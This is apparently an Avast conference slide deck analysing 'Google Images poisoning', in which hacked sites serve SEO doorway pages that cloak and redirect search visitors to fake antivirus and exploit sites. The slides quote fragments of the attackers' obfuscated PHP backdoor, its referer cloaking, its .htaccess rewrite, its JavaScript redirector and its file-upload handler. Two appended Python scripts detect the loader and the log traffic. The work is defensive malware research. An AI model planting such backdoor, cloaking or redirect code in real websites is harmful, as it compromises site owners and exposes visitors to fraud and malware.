
Poisoning Google images

There have long been links on the internet that take the unwary user to a page with unexpected or malicious content. Most of these attempts rely on the user clicking the link to succeed. However, the latest variation has moved beyond simple text links to "Google-image poisoning": placing malware in the middle of Google searches for images, where users have traditionally had no reason to be wary. Our presentation will focus on how malware writers are able to infect the average website, with detailed analyses of the PHP script used to infect sites and of the SEO techniques used to get infected images to the top of search results.



  1. Analysis of Google Images Poisoning. Lukáš Hamík, Jan Širmer. www.avast.com
  2. Agenda (AVAR 2011 www.avast.com)
      • What is Google-images poisoning?
      • How it works
      • Doorway generator
      • JavaScript redirector
      • Evolution
      • Data from AVAST CommunityIQ userbase
      • Summary
      • Questions
  3. Google Images poisoning
      • SEO blackhat poisoning attack
      • Uses hacked sites to redirect users to sites containing fake AV or exploits
      • Uses keyword-rich pages with hot-linked images for higher indexing by search bots
      • Images from hacked sites appear near the top of the search results
      • Focused on users coming from well-known search engines
  4. Google Images poisoning: how it works? (diagram: User, Infected server)
  5. Google search results (screenshot)
  6. Google Images poisoning (diagram: User, Infected server, Fake AV, Remote server)
  7. Fake antiviruses (screenshots)
  8. Google Images poisoning (diagram: User, Infected server, Fake AV, Remote server, Bad guy)
  9. Why is it so successful?
      • Great SEO, and nobody used SEO for "images"
  10. Why is it so successful? (2)
      • Computer users do not expect that they can get infected when searching for images on legitimate sites (diagram: Infected server, Fake AV server)
  11. Why is it so successful? (3)
      • Hide and seek: if users are using the Opera browser or they are coming from Google, Yahoo or Bing, they are served a JavaScript redirector (diagram: Malicious content)
  12. Your website gets infected
      • The bad guys are using stolen FTP credentials
      • They upload a PHP script to the web server
      • This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to the web server
      • Bonus feature: it lets the owners know that the page is ready
  13. Additional malicious files
      • xmlrpc.txt – remote server address stored
      • -> xml.txt -> xml.cgi – address in Base64
      • iog.txt – redirecting JavaScript stored
      • shab100500.txt – spam HTML template stored
      • -> don.txt – HTML template in Base64
  14. PHP script on infected sites
      • Earlier, they used names such as d{1,3}.php
      • Today, they use names like microphone.php, etc.
      • This script is responsible for:
        1. Creating spam pages for Google bot indexing
        2. Changing .htaccess
        3. Serving the redirect script to users, to exploit sites
        4. Serving the redirect script to users, to fake AV
        5. Downloading malicious files to the server
        6. Telling the owners that the site is ready
  15. PHP script: original PHP file uploaded to the server
        <?eval (gzuncompress (base64_decode(eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=) ) ); ?>
  16. PHP script: PHP file after the first step of deobfuscation
        $GLOBALS[_1600532410_]=Array(base64_decode(ZXJyb3Jfcm.Vwb3J0.aW5n ...
        Function _1070120820($i) {$a=Array(c.Q=.=,cQ==, ...
        ($GLOBALS[_1600532410_][16]( _1070120820(6))) {…
  17. PHP script after removing the obfuscation
        if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {}
        if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
            $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
  18. Doorway generator
      • The HTML template is stored in the file .log/SITE/shab100500.txt
      • In the new version, shab100500.txt was replaced by don.txt
      • Template: filler text around a <Replaceme> </Replaceme> tag
        <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in <Replaceme> </Replaceme> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML>
  19. Doorway generator
      • Get the descriptions of the top 40 'search keywords' from Google web
      • Shuffle the words in their descriptions to get unique text
      • Example of the generated text: "harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived"
  20. Doorway generator
      • Get the top 20 'search keyword' results from Google Images and extract the links to the image files
      • Generate <img> tags and shuffle them:
        <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
  21. Doorway generator: the shuffled text interleaved with the hot-linked <img> tags, e.g.
        <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)"> harmful action against a person or group in response revenge to a grievance <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)"> be it real or rick santorum perceived
  22. Doorway generator: resulting page layout
        <HTML>
        Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
        <h1>SEARCH KEYWORD</h1>
        Suggested links
        <Replaceme>Links to 30 most recently generated links</Replaceme>
        Rich-word generated text with hot-linked images
        Links to alternative pages
        Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
        </HTML>
  23. How do they make image URLs less suspicious?
      • The script writes the following rules into .htaccess (a PHP string; SCRIPT_NAME is the script's own file name):
        "RewriteEngine On
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteRule ^(.*)$ " . $_SERVER['SCRIPT_NAME'] . "?q=$1 [L]"
      • This changes the URL from the suspicious http://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywords
  24. PHP script evolution
      • The first version was focused on all users using the Opera browser or users coming from Google, Yahoo or Bing
      • During June, we found some changes in the PHP code: Google is the only target, and there is a new redirection system
      • The request goes to a remote server (mydiarycom.net), i.e. it is centralized
      • They have statistical data from the parameters
      • No need to update iog.txt (the redirecting script) or make differentiating changes on each server
  25. Data parameters: http://mydiarycom.net/out/stat.cgi?parameter=
        1. Name of the doorway site
        2. The full URL of the doorway script
        3. Visitor's IP
        4. The referring URL
        5. The User-Agent of the user's browser
        6. The search query used on Google
  26. IP address and user-agents: Fake AV (screenshot)
  27. IP address and user-agents: Spam page (screenshot)
  28. JavaScript redirector
        var URL = "SITE contains FakeAV" + encodeURIComponent(document.referrer)
            + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + encodeURIComponent(document.URL)
            + "&default_keyword=default";
        if (window != top) { top.location.href = URL; } else document.location = URL;
  29. Redirection
      • Mac – http://IP/r/RANDOM_STRING; the IP and 'r' change every 30 minutes
      • Exploit site – http://SITE/index.php?tp=RANDOM_STRING; the site and 'tp' change every 30 minutes
      • Fake AV – http://SITE/fast-scan/
  30. Other changes
      • Rotating user-agent string
      • Password-protected maintenance request (someone who knows how this algorithm works can easily change it and redirect to his or her own site)
      • xml.txt was replaced by xml.cgi
      • Working with free blog sites
  31. Password-protected maintenance request
        if ($_GET['dom100500'] != '') {
            $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
            fwrite($_13, $_GET['dom100500']);
            fclose($_13);
        }
        if ($_GET['up100500'] != '') {
            $_14 = $_14 . basename($_FILES['uploaded']['name']);
            $_15 = round(0+0.5+0.5);
            if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14))
  32. Data from the AVAST CommunityIQ
      • From March to August 2011, we discovered 22,580 unique infected sites
      • 5,698 sites are still infected
      • Typo in the generated HTML: <IMG HEIGTH="1" WIDTH
  33. Infected domains (chart)
  34. Number of infected domains (chart)
  35. Summary
      • Google-image poisoning is an easy way to spread fake AV and exploits
      • It's based on stolen FTP credentials of webmasters and great backdoor algorithms
      • The number of infected legitimate domains is growing every day
      • Common sense is not sufficient protection
  36. Questions and Answers
  37. Thank you. Jan Sirmer (sirmer@avast.com), Senior Virus Analyst. Lukas Hasik (hasik@avast.com), QA Director
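The loader form on slide 15 (eval of gzuncompress of base64_decode) and the decoded checks on slides 17 and 23 are what a webmaster or incident responder would look for when triaging a suspicious PHP file. The following Python script is an added example, not code from the talk or from Avast: it peels one loader layer and reports which of the indicators the decoded body shows. The sample PHP body is constructed to mirror the slides; its variable names, the placeholder loader and the indicator regexes are assumptions. PHP's gzuncompress() consumes zlib-format data, which is what zlib.decompress handles, so the unwrapping is exact.

```python
# Added example (not code from the AVAR 2011 talk): static triage of a PHP file
# for the eval(gzuncompress(base64_decode(...))) loader (slide 15) and for the
# cloaking / .htaccess indicators of the decoded script (slides 17 and 23).
import base64
import re
import zlib
from typing import Optional

# Constructed stand-in for the decoded backdoor body. It mirrors the shape shown
# on slides 17 and 23; the variable names and exact strings are assumptions.
INNER_PHP = b"""<?php
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) { }
if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.')
    || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
    $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
}
$rules = "RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ " . $_SERVER['SCRIPT_NAME'] . "?q=$1 [L]";
?>"""


def wrap_like_loader(plain_php: bytes) -> str:
    """Build the one-line loader form seen on slide 15 (constructed sample only)."""
    blob = base64.b64encode(zlib.compress(plain_php)).decode("ascii")
    return "<?eval(gzuncompress(base64_decode('%s')));?>" % blob


# Matches the loader call chain and captures the base64 blob (quotes optional,
# since the slide shows the blob unquoted).
LOADER_RE = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def unwrap_loader(php_source: str) -> Optional[bytes]:
    """Peel one eval/gzuncompress/base64_decode layer; None if absent or undecodable."""
    match = LOADER_RE.search(php_source)
    if not match:
        return None
    try:
        # gzuncompress() is zlib (RFC 1950) format, not gzip.
        return zlib.decompress(base64.b64decode(match.group(1)))
    except (ValueError, zlib.error):
        return None


# Indicators a defender would look for in the (decoded) script body.
INDICATORS = {
    "referer_cloaking": re.compile(r"HTTP_REFERER.{0,40}(google|yahoo|bing)\.", re.S),
    "opera_ua_check": re.compile(r"HTTP_USER_AGENT.{0,40}Opera", re.S),
    "hidden_log_dir": re.compile(r"\.log/"),
    "catchall_rewrite": re.compile(
        r"RewriteCond\s+%\{REQUEST_FILENAME\}\s+!-f.*?RewriteRule\s+\^\(\.\*\)\$", re.S),
}


def triage(php_source: str) -> dict:
    """Report whether the loader is present and which indicators the body shows.

    If the loader is found the decoded body is scanned, otherwise the raw source
    (an unobfuscated copy of the script would still trip the indicators).
    """
    decoded = unwrap_loader(php_source)
    body = decoded.decode("utf-8", "replace") if decoded is not None else php_source
    found = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
    return {"loader": decoded is not None, "indicators": found}


if __name__ == "__main__":
    sample = wrap_like_loader(INNER_PHP)
    print(triage(sample))                      # loader True, four indicators
    print(triage("<?php echo 'hello'; ?>"))   # loader False, no indicators
```

Real samples usually stack several layers (slide 16 shows a second, array-based stage beneath the first), so in practice unwrap_loader is run in a loop until no loader pattern remains, and the indicator scan is applied to the innermost body.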
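Slides 23 and 31 also give a site owner something to hunt for in the web server's own access log: requests carrying the dom100500/up100500 maintenance parameters, crawler hits on extensionless "search keyword" paths that the catch-all rewrite routes into the PHP script, and search-engine-referred visitors landing on those same doorway paths. The Python below is an added example, not code from the talk or from Avast; the log lines are constructed in Apache combined format (documentation IP ranges, placeholder remote host), and the choice of /wp-admin/ as the doorway directory follows the URL shown on slide 23 but is otherwise an assumption.

```python
# Added example (not code from the AVAR 2011 talk): hunting in a compromised
# site's Apache combined access log for the traffic patterns of slides 23 and 31.
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

MAINTENANCE_PARAMS = {"dom100500", "up100500"}   # parameter names from slide 31
SEARCH_HOSTS = ("google.", "yahoo.", "bing.")      # referers the script keys on (slide 17)
# Extensionless slug under a directory that should never serve public pages;
# /wp-admin/ follows slide 23 but the directory is an assumption for this example.
DOORWAY_PATH_RE = re.compile(r"^/wp-admin/[a-z0-9-]+$")

# Constructed sample log (documentation IP ranges; REMOTE-PLACEHOLDER stands in
# for the attacker-controlled host written into xmlrpc.txt).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2011:10:01:02 +0000] "GET /wp-admin/microphone.php?dom100500=http://REMOTE-PLACEHOLDER/ HTTP/1.1" 200 12 "-" "Mozilla/5.0"
192.0.2.10 - - [12/Jun/2011:10:05:07 +0000] "GET /wp-admin/cute-kittens HTTP/1.1" 200 8421 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [12/Jun/2011:10:06:30 +0000] "GET /wp-admin/cute-kittens HTTP/1.1" 200 2203 "http://www.google.com/imgres?imgurl=http%3A%2F%2Fexample.org%2Fkitten.jpg" "Opera/9.80 (Windows NT 6.1)"
198.51.100.8 - - [12/Jun/2011:10:07:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Jun/2011:10:09:45 +0000] "POST /wp-admin/microphone.php?up100500=1 HTTP/1.1" 200 30 "-" "Mozilla/5.0"
""".splitlines()


def classify(entry: dict) -> list:
    """Return the finding names that apply to one parsed log entry."""
    findings = []
    url = urlsplit(entry["target"])
    params = set(parse_qs(url.query, keep_blank_values=True))
    if params & MAINTENANCE_PARAMS:
        # Remote-address change or file upload through the backdoor (slide 31).
        findings.append("maintenance_request")
    if DOORWAY_PATH_RE.match(url.path) and entry["status"] == "200":
        # A keyword slug answered 200 although no such file exists: the
        # catch-all rewrite of slide 23 is serving a doorway page.
        referer = entry["referer"]
        ref_host = (urlsplit(referer).hostname or "") if referer != "-" else ""
        if "Googlebot" in entry["ua"]:
            findings.append("doorway_crawl")
        elif any(s in ref_host for s in SEARCH_HOSTS):
            findings.append("search_referred_doorway_hit")
    return findings


def scan_log(lines) -> list:
    """Parse combined-format lines; return (finding, client_ip, path) in log order."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, skip
        entry = m.groupdict()
        path = urlsplit(entry["target"]).path
        for finding in classify(entry):
            results.append((finding, entry["ip"], path))
    return results


def summarize(results) -> dict:
    """Count findings by name."""
    return dict(Counter(f for f, _, _ in results))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for finding, ip, path in hits:
        print(f"{finding:28s} {ip:15s} {path}")
    print(summarize(hits))
```

The doorway_crawl and search_referred_doorway_hit findings are the two sides of the scheme seen from the victim server: the crawler is fed keyword pages so the images rank, and the human visitor who follows the image result is the one the script cloaks and redirects. Either finding on a path that does not exist on disk is a strong signal that the rewrite rule from slide 23 is in place.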
